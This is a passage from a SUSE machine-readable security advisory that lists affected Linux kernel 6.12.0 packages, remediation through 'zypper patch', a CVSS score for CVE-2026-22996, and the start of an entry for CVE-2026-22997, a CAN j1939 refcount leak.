"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22996",
"url": "https://www.suse.com/security/cve/CVE-2026-22996"
},
{
"category": "external",
"summary": "SUSE Bug 1257203 for CVE-2026-22996",
"url": "https://bugzilla.suse.com/1257203"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22996"
},
{
"cve": "CVE-2026-22997",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22997"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: can: j1939: j1939_xtp_rx_rts_session_active(): deactivate session upon receiving the second rts\n\nSince j1939_session_deactivate_activate_next() in j1939_tp_rxtimer() is\ncalled only when the timer is enabled, we need to call\nj1939_session_deactivate_activate_next() if we cancelled the timer.\nOtherwise, refcount for j1939_session leaks, which will later appear as\n\n| unregister_netdevice: waiting for vcan0 to become free. Usage count = 2.\n\nproblem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
